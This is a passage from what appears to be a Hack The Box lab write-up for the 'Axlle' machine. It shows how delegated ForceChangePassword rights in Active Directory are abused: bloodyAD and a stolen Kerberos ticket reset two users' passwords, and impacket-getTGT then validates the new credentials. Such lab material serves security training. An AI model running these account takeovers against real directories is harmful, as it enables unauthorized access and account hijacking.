ForcePasswordChange


As discovered from BloodHound, the dallon.matrix user has transitive ForceChangePassword access over both the baz.humphries and jacob.greeny users through its membership in the Web Devs group

Both the jacob.greeny and baz.humphries users are members of the Remote Management Users group

Now that I have validated the credential of the dallon.matrix user, and obtained the TGT, I can perform ForceChangePassword remotely

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ echo -e '[realms]\n\n\tAXLLE.HTB = {\n\t\tkdc = mainframe.axlle.htb\n\t}' | sudo tee /etc/krb5.conf  
 
[realms]
 
	AXLLE.HTB = {
		kdc = mainframe.axlle.htb
	}

First, I will set up the /etc/krb5.conf file, so that BloodyAD works

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=dallon.matrix@mainframe.axlle.htb.ccache bloodyAD -d AXLLE.HTB -k --host mainframe.axlle.htb set password jacob.greeny Qwer1234
[+] Password changed successfully!

While there are many ways to change the password of a user, I will be using bloodyAD with the TGT of the dallon.matrix user to change the password of the jacob.greeny user

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=dallon.matrix@mainframe.axlle.htb.ccache bloodyAD -d AXLLE.HTB -k --host mainframe.axlle.htb set password baz.humphries Qwer1234
[+] Password changed successfully!

I also reset the password of the baz.humphries user

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/jacob.greeny@mainframe.axlle.htb' -k -dc-ip $IP              
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in jacob.greeny@mainframe.axlle.htb.ccache

Validated TGT saved for the jacob.greeny account

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/baz.humphries@mainframe.axlle.htb' -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in baz.humphries@mainframe.axlle.htb.ccache

Validated TGT saved for the baz.humphries account